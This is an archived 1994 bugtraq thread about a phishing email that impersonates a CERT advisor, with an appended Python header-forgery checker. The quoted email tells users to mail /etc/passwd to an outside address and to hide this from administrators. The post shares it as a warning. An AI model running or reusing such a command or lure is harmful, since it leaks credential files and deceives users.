[80] in bugtraq
Re: Another request for passwords
daemon@ATHENA.MIT.EDU (Charles Howes)
Sun Oct 23 08:43:45 1994
Date: Sun, 23 Oct 1994 04:17:40 -0700 (PDT)
From: Charles Howes <chowes@helix.net>
To: "Douglas R. Floyd" <dfloyd@paris.eng.utsa.edu>
Cc: bugtraq@crimelab.com
In-Reply-To: <9410230054.ZM10281@paris.eng.utsa.edu>

On Sun, 23 Oct 1994, Douglas R. Floyd wrote:
> I got this in the mail today (10-23).
> Seems like someone is knocking on io.com now.
>
> (The forward to paris is normal as mail gets forwarded there.)
>
> BEGIN FUNKY MESSAGE --------
>
> >From vanepp@sfu.ca Sun Oct 23 00:00:56 1994
> Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
> (931110.SGI/930416.SGI.AUTO)
> for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
> Received: from trance.helix.net
> by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
> id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
> From: vanepp@sfu.ca
> Received: from (helix.net [142.231.37.2]) by trance.helix.net
> (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
> dfloyd@pentagon.io.com; Sat, 22 Oct 1994 21:33:23 -0700
> Message-Id: <199410230433.VAA07859@trance.helix.net>
> Date: Sat, 22 Oct 1994 14:22:25
> To: dfloyd@pentagon.io.com
> Subject: Very Important
> Status: RO
>
> Dear user,
>
> It is imperative that I attain your /etc/passwd file
> immediately. It is for security reasons. You can mail
> it to me by typing:
>
> mail vanepp@sfu.ca < /etc/passwd
>
> Do not tell your system administrator. I am
> conducting an investigation on your system. Thank you
>
> Your identity will be kept confidential. I guarantee it
>
> Thank you for your cooperation.
>
> Peter Van Epp Technical Systems Operations
> CERT Security Advisor
> vanepp@sfu.ca
>
>
> END FUNKY MESSAGE -----
>
> I sent cert@cert.org a copy, as well as the admins at io.com.
>
> I know this was posted earlier, but I think this is another address,
> possibly an MX record as I could not telnet or finger sfu.ca.

Hi.

Yes, someone broke into an account here at Helix, and seems to have a
grudge against one or more people. Vanepp in particular.

Argh. This is the third mailbomb. I'm supposed to be in charge of
security; how do you protect against this??!?

We're using shadow passwords as of tonight, and tcp wrappers as of
last month. The bugger keeps signing on via modem, and this is a
problem. We can't afford callerid.

--
Charles Howes -- chowes@helix.net
Always tell the truth, then you make it the other bloke's problem!
- Sean Connery, 1971
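
Added example (not part of the original thread or written by either poster): a short Python check that reads the headers of the quoted message and reports two things visible in them, that the From: domain (sfu.ca) does not appear in the oldest Received: hop (helix.net), and that the Date: header carries no time zone. The function names and the two-label domain comparison are assumptions of this sketch; a mismatch is a heuristic signal, not proof, since Received: lines added before the first relay you trust can themselves be forged.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Headers of the message quoted on this page, with the "> " quoting removed.
SAMPLE = """\
Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
 (931110.SGI/930416.SGI.AUTO)
 for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
Received: from trance.helix.net
 by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
 id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
From: vanepp@sfu.ca
Received: from (helix.net [142.231.37.2]) by trance.helix.net
 (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
 dfloyd@pentagon.io.com; Sat, 22 Oct 1994 21:33:23 -0700
Message-Id: <199410230433.VAA07859@trance.helix.net>
Date: Sat, 22 Oct 1994 14:22:25
To: dfloyd@pentagon.io.com
Subject: Very Important
"""

def org_domain(host):
    # Last two labels only: an approximation that ignores multi-label suffixes.
    return ".".join(host.lower().strip(".").split(".")[-2:])

def first_hop(msg):
    """Return (from_part, by_host) of the oldest Received header, or None."""
    for value in reversed(msg.get_all("Received", [])):  # newest is listed first
        m = re.match(r"from (.*?) by (\S+)", " ".join(value.split()))
        if m:
            return m.group(1), m.group(2)
    return None

def findings(raw):
    msg, out = message_from_string(raw), []
    sender = org_domain(parseaddr(msg.get("From", ""))[1].rpartition("@")[2])
    hop = first_hop(msg)
    if hop:
        names = re.findall(r"[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+", " ".join(hop))
        hosts = {org_domain(n) for n in names if not re.fullmatch(r"[\d.]+", n)}
        if sender not in hosts:
            out.append(f"From domain {sender} not in first hop {sorted(hosts)}")
    if not re.search(r"([+-]\d{4}|[A-Z]{2,5})(\s*\(.*\))?\s*$", msg.get("Date", "")):
        out.append("Date header has no time zone")
    return out

if __name__ == "__main__":
    print("\n".join(findings(SAMPLE)))
```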